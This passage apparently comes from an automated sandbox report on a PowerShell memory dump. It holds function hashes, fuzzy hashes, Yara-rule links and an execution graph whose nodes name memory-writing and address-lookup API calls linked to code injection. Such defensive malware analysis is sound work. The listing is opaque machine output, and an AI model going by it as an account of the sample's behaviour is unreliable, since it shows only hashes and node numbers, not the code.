                                                                                                                                      • Opcode Fuzzy Hash: 7163a535540e0b075cab7dd4cd36d358914d87f8ba77e221f095ddee4226ade2
                                                                                                                                      • Instruction Fuzzy Hash: 54E086537071956796A421BA16146BB418B4FC9251F1501BAEA0DC7692DC49CD1243F2
                                                                                                                                      Function 007E9168 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a780460cd3ac52731b6f39030b0e76af6a469dd7b102d777a6c92d1c70b610b
                                                                                                                                      • Instruction ID: db836e22809a89c85281161353b67320208e8139009ce55f0e884675299c0b4d
                                                                                                                                      • Opcode Fuzzy Hash: 3a780460cd3ac52731b6f39030b0e76af6a469dd7b102d777a6c92d1c70b610b
                                                                                                                                      • Instruction Fuzzy Hash: 73F0ED719013049BD7A4ABB9D89D7DA7BE5FB44310F104469E65ED7340DB396980CB90
                                                                                                                                      Function 007E896A Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bcfe489a773dabede298b1ff188cca9747bf37926cf0d9dad745a8aa00d631e4
                                                                                                                                      • Instruction ID: 4e38e1452e7467a383c369456686ab006e83dea42128837905a9b35301a2363a
                                                                                                                                      • Opcode Fuzzy Hash: bcfe489a773dabede298b1ff188cca9747bf37926cf0d9dad745a8aa00d631e4
                                                                                                                                      • Instruction Fuzzy Hash: E3E092757081918BCB097774D81C2ED2A63EBC4715F04002EE61A83382CF7C4915C7D5
                                                                                                                                      Function 007E8978 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 477f0850196745afba9e98751626655e56ed3c3cbc02f3767690b0b9693601aa
                                                                                                                                      • Instruction ID: 3521f4b3d35b1804e39e9ddb5e1ddc55d8bb219d5cfc570f86f6db03e5db693f
                                                                                                                                      • Opcode Fuzzy Hash: 477f0850196745afba9e98751626655e56ed3c3cbc02f3767690b0b9693601aa
                                                                                                                                      • Instruction Fuzzy Hash: 6BE0263530429087CB093779E80D2EE7A96FBC8720F00002AE60683341CF7C1D01C3D5
                                                                                                                                      Function 007EAF88 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 412e692905ad50d566107d2bcdd872fb3a5015413277ada27232fbae036f86e3
                                                                                                                                      • Instruction ID: ef76c44398aa8298b3b18946d842ede7654b8cbca4a340599756aa0951ac98e9
                                                                                                                                      • Opcode Fuzzy Hash: 412e692905ad50d566107d2bcdd872fb3a5015413277ada27232fbae036f86e3
                                                                                                                                      • Instruction Fuzzy Hash: 4AD02B2770C2D127CB19603F74202A66B9BCBCD260709807AF508CB341DC56DC0202E1
                                                                                                                                      Function 007E9550 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 85b422a3c8efe95bf17e2c8f3f39d53a333699388774d6fff6109704bcba813b
                                                                                                                                      • Instruction ID: f196b001b2ed170b9f7bbf37f3f16613a44ea32c2bf556acc082ce44293dc2f8
                                                                                                                                      • Opcode Fuzzy Hash: 85b422a3c8efe95bf17e2c8f3f39d53a333699388774d6fff6109704bcba813b
                                                                                                                                      • Instruction Fuzzy Hash: ECD05E537071A92715E430BF1905ABB91CF8ACE6A0B1501B6EA0DC7292EC49CD1243F2
                                                                                                                                      Function 007EDCE8 Relevance: .0, Instructions: 23COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                      • Instruction ID: bcc3d67bc784aaa1d7b5a10c42fab34d01e4318e251dce8755c5f020d26008ce
                                                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                      • Instruction Fuzzy Hash: 08E08631B10054978B18995AD8144EDF7AADBCC320F14807BD90AA7340DA725D1586E1
                                                                                                                                      Function 007EF460 Relevance: .0, Instructions: 22COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 94aa4d71e481587bf2cad701f1e7f38ef065e480adcf8f6e356447382782e42e
                                                                                                                                      • Instruction ID: a825bdc4a362f75062bb0010b3bf6a89c068c729485af890ad7e79e6953c3ec4
                                                                                                                                      • Opcode Fuzzy Hash: 94aa4d71e481587bf2cad701f1e7f38ef065e480adcf8f6e356447382782e42e
                                                                                                                                      • Instruction Fuzzy Hash: 7DE0ED71D152469FCB44DF78C48155ABFF0EF0A314B2085FED849DB611E3324901CB95
                                                                                                                                      Function 007E8739 Relevance: .0, Instructions: 21COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c6b8a6a12358432305b3b5ec74394e3ea22645fa3cf7a3f31c9c7aaf0801314
                                                                                                                                      • Instruction ID: 4ac19d08778a805a3853389af3968db8cd3d6a413528b99edf818017a7f388c2
                                                                                                                                      • Opcode Fuzzy Hash: 0c6b8a6a12358432305b3b5ec74394e3ea22645fa3cf7a3f31c9c7aaf0801314
                                                                                                                                      • Instruction Fuzzy Hash: FEE0463190514ACBCB48AFA4F81A4FDBFB4FB14321B00015EE907536909E381A8ACAC1
                                                                                                                                      Function 007E8800 Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a30de1a840738f570a88c8879c68c305800ec6f090a43eae556601b9203cdd4
                                                                                                                                      • Instruction ID: 3b04a3b29221f09bd1451279c572f0e1b913b31cae28ae4eff5db6fbcf93c312
                                                                                                                                      • Opcode Fuzzy Hash: 8a30de1a840738f570a88c8879c68c305800ec6f090a43eae556601b9203cdd4
                                                                                                                                      • Instruction Fuzzy Hash: 04E08631F09147CFC748EFA4E4465ED7FB1AB45304B008069E90997741DA305D41CB81
                                                                                                                                      Function 007EF470 Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                      • Instruction ID: 394b6746088f20fc0363e68fe51d84b189e6dc6662121548b8abe16da7d5749c
                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                      • Instruction Fuzzy Hash: 53D067B0D052499F8780EFADC94166EFBF4EB49200F6085BAC91DE7341E7329A12CBD1
                                                                                                                                      Function 007E8748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 56659f7794446e8f36a253140f0fc1ef439a9151ee0e845f654804ca249c8de3
                                                                                                                                      • Instruction ID: 836297a36d04fc7f8f182183d6c2ad68d7953c8b52652fc595e934e83de77a0a
                                                                                                                                      • Opcode Fuzzy Hash: 56659f7794446e8f36a253140f0fc1ef439a9151ee0e845f654804ca249c8de3
                                                                                                                                      • Instruction Fuzzy Hash: 53D06731C0510ACBCB48AFA5E85B4FDBB74FA14312F504169D90753190EE351A5ACEC5
                                                                                                                                      Function 007E8810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: babb8867fd1b8b7d6e0faf9f88aabb5f21fa306bc55b4c1c074eb30d82bed7e5
                                                                                                                                      • Instruction ID: db9439375f1826dee62dbc9767c6cc3f1a7a910ee51743d4e2a1183de914c434
                                                                                                                                      • Opcode Fuzzy Hash: babb8867fd1b8b7d6e0faf9f88aabb5f21fa306bc55b4c1c074eb30d82bed7e5
                                                                                                                                      • Instruction Fuzzy Hash: 41D01234D0420A8FC748EF64E8468ADBBB4AB45300F104165DD0993340EA345C01CBC1
                                                                                                                                      Function 007E7940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3f19d0e731eca4a2d13ccc0ee380d7432dcc5def6df76d712b5a3fbca4cde6b2
                                                                                                                                      • Instruction ID: 720b4710ffaa8057c67b0e25aedd2aed5e0ffa157110b96c91f4ba840435eadf
                                                                                                                                      • Opcode Fuzzy Hash: 3f19d0e731eca4a2d13ccc0ee380d7432dcc5def6df76d712b5a3fbca4cde6b2
                                                                                                                                      • Instruction Fuzzy Hash: 0DB09230185B488FC2486F75AC04915732DAB40216B9004A8E80E0A2A28E7AE884CE44
                                                                                                                                      Function 007E7EB1 Relevance: .0, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000E.00000002.2557993988.00000000007E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_14_2_7e0000_powershell.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c966ce1e7402bb1515dab60a37b61d6257a0e10546ed9c0cc8db9e4638881f47
                                                                                                                                      • Instruction ID: 497e4112004dc7f6cafb865955b301fcafbc78a1d5301691b20a282f09d15350
                                                                                                                                      • Opcode Fuzzy Hash: c966ce1e7402bb1515dab60a37b61d6257a0e10546ed9c0cc8db9e4638881f47
                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:9.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:1477
                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                      execution_graph 24981 2bbbb44 24984 2baec74 24981->24984 24983 2bbbb4c 24985 2baec7c 24984->24985 24985->24985 26430 2ba870c 24985->26430 24987 2baec9e 24988 2baeca3 24987->24988 24989 2baed28 24988->24989 26436 2ba8824 24989->26436 24991 2baed3b 24992 2baed8c 24991->24992 24993 2ba8824 3 API calls 24992->24993 24994 2baed9f 24993->24994 24995 2baedf0 24994->24995 24996 2baedfa 24995->24996 24997 2ba8824 3 API calls 24996->24997 24998 2baee03 24997->24998 24999 2baee5e 24998->24999 25000 2ba8824 3 API calls 24999->25000 25001 2baee67 25000->25001 25002 2baeec2 25001->25002 25003 2ba8824 3 API calls 25002->25003 25004 2baeecb 25003->25004 25005 2baeee9 25004->25005 25006 2baef26 25005->25006 25007 2ba8824 3 API calls 25006->25007 25008 2baef2f 25007->25008 25009 2baef4d 25008->25009 25010 2ba8824 3 API calls 25009->25010 25011 2baef93 25010->25011 25012 2baef98 25011->25012 25013 2bbaa23 25012->25013 25014 2baefa0 25012->25014 26444 2baebf0 25014->26444 25016 2baefa5 25016->25013 25017 2ba8824 3 API calls 25016->25017 25018 2baefd4 25017->25018 25019 2baeff2 25018->25019 25020 2ba8824 3 API calls 25019->25020 25021 2baeffb 25020->25021 25022 2ba8824 3 API calls 25021->25022 25023 2baf02e 25022->25023 25024 2baf067 25023->25024 25025 2baf09e 25024->25025 25026 2ba8824 3 API calls 25025->25026 25027 2baf0aa 25026->25027 25028 2ba8824 3 API calls 25027->25028 25029 2baf0dd 25028->25029 25030 2ba8824 3 API calls 25029->25030 25031 2baf110 25030->25031 25032 2ba8824 3 API calls 25031->25032 25033 2baf143 25032->25033 25034 2baf164 25033->25034 25035 2baf17c 25034->25035 25036 2baf1a6 25035->25036 25037 2ba8824 3 API calls 25036->25037 25038 2baf1bf 25037->25038 25039 2baf1f8 25038->25039 25040 2baf217 25039->25040 25041 2baf222 25040->25041 25042 2ba8824 3 API calls 25041->25042 25043 2baf23b 25042->25043 25044 2ba8824 3 API calls 25043->25044 25045 2baf26e 25044->25045 25046 2baf27e 25045->25046 25047 2ba8824 3 API calls 25046->25047 25048 2baf2a1 25047->25048 25049 2ba8824 3 API calls 25048->25049 25050 2baf2d4 25049->25050 25051 2baf300 25050->25051 25052 2baf32c 25051->25052 25053 2ba8824 3 API calls 25052->25053 25054 2baf350 25053->25054 25055 2ba8824 3 API calls 25054->25055 25056 2baf383 25055->25056 25057 2baf3aa 25056->25057 25058 2ba8824 3 API calls 25057->25058 25059 2baf3b6 25058->25059 25060 2ba8824 3 API calls 25059->25060 25061 2baf3e9 25060->25061 25062 2baf40a 25061->25062 25063 2baf415 25062->25063 25064 2baf422 25063->25064 25065 2ba8824 3 API calls 25064->25065 25066 2baf465 25065->25066 25067 2baf491 25066->25067 25068 2baf4c8 25067->25068 25069 2ba8824 3 API calls 25068->25069 25070 2baf4e1 25069->25070 25071 2baf508 25070->25071 25072 2ba8824 3 API calls 25071->25072 25073 2baf514 25072->25073 25074 2baf53b 25073->25074 25075 2ba8824 3 API calls 25074->25075 25076 2baf547 25075->25076 25077 2ba8824 3 API calls 25076->25077 25078 2baf57a 25077->25078 25079 2baf5b3 25078->25079 25080 2ba8824 3 API calls 25079->25080 25081 2baf5f6 25080->25081 25082 2baf62f 25081->25082 25083 2ba8824 3 API calls 25082->25083 25084 2baf672 25083->25084 25085 2baf693 25084->25085 25086 2baf6ab 25085->25086 25087 2ba8824 3 API calls 25086->25087 25088 2baf6ee 25087->25088 25089 2baf70f 25088->25089 25090 2baf727 25089->25090 25091 2ba8824 3 API calls 25090->25091 25092 2baf76a 25091->25092 25093 2baf779 25092->25093 25094 2baf7a3 25093->25094 25095 2baf7df 25094->25095 25096 2baf80b 25095->25096 25097 2baf823 25096->25097 25098 2ba8824 3 API calls 25097->25098 25099 2baf82f 25098->25099 25100 2baf850 25099->25100 25101 2baf85b 25100->25101 25102 2baf887 25101->25102 25103 2baf89f 25102->25103 25104 2ba8824 3 API calls 25103->25104 25105 2baf8ab 25104->25105 25106 2baf8cc 25105->25106 25107 2baf9e1 25106->25107 25108 2baf8d4 25106->25108 25110 2bafa0d 25107->25110 25109 2baf8f5 25108->25109 25111 2baf92c 25109->25111 25112 2bafa39 25110->25112 25114 2ba8824 3 API calls 25111->25114 25113 2ba8824 3 API calls 25112->25113 25115 2bafa5d 25113->25115 25116 2baf950 25114->25116 25118 2bafab5 25115->25118 25117 2baf9a8 25116->25117 25120 2ba8824 3 API calls 25117->25120 25119 2ba8824 3 API calls 25118->25119 25121 2baf9cc 25119->25121 25120->25121 25122 2bafb1a 25121->25122 25123 2bafb32 25122->25123 25124 2bafb51 25123->25124 25125 2ba8824 3 API calls 25124->25125 25126 2bafb75 25125->25126 25127 2bafbae 25126->25127 25128 2bafbcd 25127->25128 25129 2bafbd8 25128->25129 25130 2ba8824 3 API calls 25129->25130 25131 2bafbf1 25130->25131 25132 2bafc28 25131->25132 25133 2bafc41 25132->25133 25134 2bafc62 25133->25134 25135 2bafc7a 25134->25135 25136 2ba8824 3 API calls 25135->25136 25137 2bafcbd 25136->25137 25138 2bafcde 25137->25138 25139 2bafce9 25138->25139 25140 2bafcf6 25139->25140 25141 2ba8824 3 API calls 25140->25141 25142 2bafd39 25141->25142 25143 2bafd65 25142->25143 25144 2bafd72 25143->25144 25145 2ba8824 3 API calls 25144->25145 25146 2bafdb5 25145->25146 25147 2bafde1 25146->25147 25148 2bafdee 25147->25148 25149 2ba8824 3 API calls 25148->25149 25150 2bafe31 25149->25150 25151 2bafe51 25150->25151 25152 2bafe7d 25151->25152 25153 2bafea9 25152->25153 25154 2ba8824 3 API calls 25153->25154 25155 2bafecd 25154->25155 25156 2bafeee 25155->25156 25157 2baff06 25156->25157 25158 2baff25 25157->25158 25159 2baff30 25158->25159 25160 2ba8824 3 API calls 25159->25160 25161 2baff49 25160->25161 25162 2baff6a 25161->25162 25163 2baff82 25162->25163 25164 2baffa1 25163->25164 25165 2baffac 25164->25165 25166 2ba8824 3 API calls 25165->25166 25167 2baffc5 25166->25167 25168 2baffcf 25167->25168 25169 2baffe7 25168->25169 25170 2bb07ab 25169->25170 25171 2baffef 25169->25171 25174 2bb07d7 25170->25174 25172 2bb0010 25171->25172 25173 2bb001b 25172->25173 25177 2bb0028 25173->25177 25175 2bb080e 25174->25175 25176 2bb081b 25175->25176 25178 2ba8824 3 API calls 25176->25178 25179 2ba8824 3 API calls 25177->25179 25181 2bb0827 25178->25181 25180 2bb006b 25179->25180 25182 2bb008c 25180->25182 25184 2bb0853 25181->25184 25183 2bb0097 25182->25183 25185 2bb00a4 25183->25185 25186 2bb0860 25184->25186 25189 2bb00c3 25185->25189 25187 2bb088a 25186->25187 25188 2bb0897 25187->25188 25190 2ba8824 3 API calls 25188->25190 25191 2ba8824 3 API calls 25189->25191 25192 2bb08a3 25190->25192 25193 2bb00e7 25191->25193 25196 2bb08cf 25192->25196 25194 2bb0108 25193->25194 25195 2bb0113 25194->25195 25197 2bb0120 25195->25197 25198 2bb08dc 25196->25198 25200 2bb013f 25197->25200 25199 2bb08fb 25198->25199 25202 2bb0913 25199->25202 25201 2bb014a 25200->25201 25204 2ba8824 3 API calls 25201->25204 25203 2ba8824 3 API calls 25202->25203 25205 2bb091f 25203->25205 25206 2bb0163 25204->25206 25207 2bb0941 25205->25207 25208 2bb0174 25206->25208 25209 2bb0951 25207->25209 25210 2bb0195 25208->25210 25212 2bb0972 25209->25212 25211 2bb01c1 25210->25211 25215 2bb01ed 25211->25215 25213 2bb09b4 25212->25213 25214 2bb09c1 25213->25214 25217 2ba8824 3 API calls 25214->25217 25216 2bb0205 25215->25216 25218 2ba8824 3 API calls 25216->25218 25220 2bb09cd 25217->25220 25219 2bb0211 25218->25219 25222 2bb023d 25219->25222 25221 2bb09ee 25220->25221 25224 2bb09f9 25221->25224 25223 2bb0269 25222->25223 25226 2bb0281 25223->25226 25225 2bb0a3d 25224->25225 25227 2ba8824 3 API calls 25225->25227 25228 2ba8824 3 API calls 25226->25228 25229 2bb0a49 25227->25229 25230 2bb028d 25228->25230 25231 2bb0a6a 25229->25231 25233 2bb02b9 25230->25233 25232 2bb0a75 25231->25232 25234 2bb0a82 25232->25234 25235 2bb02e5 25233->25235 25236 2bb0ab9 25234->25236 25237 2bb02fd 25235->25237 25238 2ba8824 3 API calls 25236->25238 25239 2ba8824 3 API calls 25237->25239 25240 2bb0ac5 25238->25240 25241 2bb0309 25239->25241 25244 2bb0ada 25240->25244 25242 2bb031e 25241->25242 25243 2bb0331 25242->25243 25245 2bb0352 25243->25245 25246 2bb0b0e 25244->25246 25247 2bb035d 25245->25247 25249 2bb0b26 25246->25249 25248 2bb0389 25247->25248 25251 2bb03a1 25248->25251 25250 2bb0b50 25249->25250 25252 2ba8824 3 API calls 25250->25252 25253 2ba8824 3 API calls 25251->25253 25254 2bb0b69 25252->25254 25255 2bb03ad 25253->25255 25258 2bb0b8a 25254->25258 25256 2bb03ce 25255->25256 25257 2bb03d9 25256->25257 25260 2bb03e6 25257->25260 25259 2bb0ba2 25258->25259 25263 2bb0bcc 25259->25263 25261 2bb0405 25260->25261 25262 2bb041d 25261->25262 25265 2ba8824 3 API calls 25262->25265 25264 2ba8824 3 API calls 25263->25264 25266 2bb0be5 25264->25266 25267 2bb0429 25265->25267 25270 2bb0c06 25266->25270 25268 2bb0438 25267->25268 25269 2bb0442 25268->25269 25271 2bb044a 25269->25271 25272 2bb07a6 25269->25272 25274 2bb0c1e 25270->25274 25273 2bb046b 25271->25273 25279 2bb1fb1 25272->25279 25276 2bb0476 25273->25276 25275 2bb0c48 25274->25275 25277 2ba8824 3 API calls 25275->25277 25283 2bb04ad 25276->25283 25278 2bb0c61 25277->25278 25280 2bb0c70 25278->25280 25282 2bb1ff5 25279->25282 25281 2bb0c7f 25280->25281 25288 2bb0ca0 25281->25288 25284 2ba8824 3 API calls 25282->25284 25285 2ba8824 3 API calls 25283->25285 25286 2bb2001 25284->25286 25287 2bb04c6 25285->25287 25293 2bb2022 25286->25293 25290 2bb04f2 25287->25290 25289 2bb0cb8 25288->25289 25291 2bb0ce2 25289->25291 25294 2bb051e 25290->25294 25292 2bb0cef 25291->25292 25295 2ba8824 3 API calls 25292->25295 25296 2bb2071 25293->25296 25297 2bb0536 25294->25297 25298 2bb0cfb 25295->25298 25299 2ba8824 3 API calls 25296->25299 25300 2ba8824 3 API calls 25297->25300 25303 2bb0d1c 25298->25303 25301 2bb207d 25299->25301 25302 2bb0542 25300->25302 25304 2bb209e 25301->25304 25307 2bb056e 25302->25307 25305 2bb0d27 25303->25305 25309 2bb20a9 25304->25309 25306 2bb0d34 25305->25306 25310 2bb0d5e 25306->25310 25308 2bb059a 25307->25308 25311 2bb05b2 25308->25311 25313 2bb20ed 25309->25313 25312 2ba8824 3 API calls 25310->25312 25316 2ba8824 3 API calls 25311->25316 25314 2bb0d77 25312->25314 25315 2ba8824 3 API calls 25313->25315 25317 2bb0d81 25314->25317 25319 2bb20f9 25315->25319 25318 2bb05be 25316->25318 25317->25272 25323 2bb0d89 25317->25323 25321 2bb05ea 25318->25321 25320 2bb2125 25319->25320 25322 2bb2151 25320->25322 25326 2bb0616 25321->25326 25325 2bb215c 25322->25325 25324 2bb0de1 25323->25324 25328 2bb0df9 25324->25328 25329 2ba8824 3 API calls 25325->25329 25327 2bb062e 25326->25327 25330 2ba8824 3 API calls 25327->25330 25333 2ba8824 3 API calls 25328->25333 25331 2bb2175 25329->25331 25332 2bb063a 25330->25332 25331->25013 25336 2bb219a 25331->25336 25334 2bb065b 25332->25334 25340 2bb0e05 25333->25340 25335 2bb0666 25334->25335 25337 2bb0673 25335->25337 26448 2b946a4 25336->26448 25341 2bb0692 25337->25341 25339 2bb21d3 25343 2bb21f2 25339->25343 25342 2bb0e5d 25340->25342 25344 2bb06aa 25341->25344 25345 2bb0e75 25342->25345 25347 2bb220a 25343->25347 25346 2ba8824 3 API calls 25344->25346 25349 2ba8824 3 API calls 25345->25349 25348 2bb06b6 25346->25348 25350 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25347->25350 25351 2bb06c0 25348->25351 25355 2bb0e81 25349->25355 25353 2bb2216 25350->25353 25352 2bb06cd 25351->25352 25354 2bb06de 25352->25354 25358 2bb224f 25353->25358 25356 2bb06ee 25354->25356 25360 2bb0ece 25355->25360 25357 2bb074b 25356->25357 25359 2bb0756 25357->25359 25361 2bb2286 25358->25361 25364 2bb0782 25359->25364 25363 2bb0ee6 25360->25363 25362 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25361->25362 25366 2bb2292 25362->25366 25365 2bb0f1d 25363->25365 25367 2bb079a 25364->25367 25368 2ba8824 3 API calls 25365->25368 25371 2bb22cb 25366->25371 25369 2ba8824 3 API calls 25367->25369 25370 2bb0f29 25368->25370 25369->25272 25372 2bb0f55 25370->25372 25374 2bb2302 25371->25374 25373 2bb0f62 25372->25373 25376 2bb0f81 25373->25376 25375 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25374->25375 25377 2bb230e 25375->25377 25379 2bb0f99 25376->25379 25378 2bb232f 25377->25378 25380 2bb233a 25378->25380 25381 2ba8824 3 API calls 25379->25381 25383 2bb2366 25380->25383 25382 2bb0fa5 25381->25382 25384 2bb0fd1 25382->25384 25385 2bb2371 25383->25385 25386 2bb0fde 25384->25386 25387 2bb237e 25385->25387 25390 2bb0ffd 25386->25390 25388 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25387->25388 25389 2bb238a 25388->25389 25391 2bb2394 25389->25391 25392 2bb1015 25390->25392 25395 2bb23a6 25391->25395 25393 2ba8824 3 API calls 25392->25393 25394 2bb1021 25393->25394 25396 2bb1042 25394->25396 25398 2bb23d7 25395->25398 25397 2bb105a 25396->25397 25399 2bb1079 25397->25399 25400 2bb23ef 25398->25400 25401 2bb1091 25399->25401 25402 2bb2426 25400->25402 25403 2ba8824 3 API calls 25401->25403 25404 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25402->25404 25405 2bb109d 25403->25405 25406 2bb2432 25404->25406 25409 2bb10be 25405->25409 25407 2bb2453 25406->25407 25408 2bb245e 25407->25408 25410 2bb246b 25408->25410 25411 2bb1100 25409->25411 25412 2bb2495 25410->25412 25413 2bb110d 25411->25413 25414 2bb24a2 25412->25414 25415 2ba8824 3 API calls 25413->25415 25416 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25414->25416 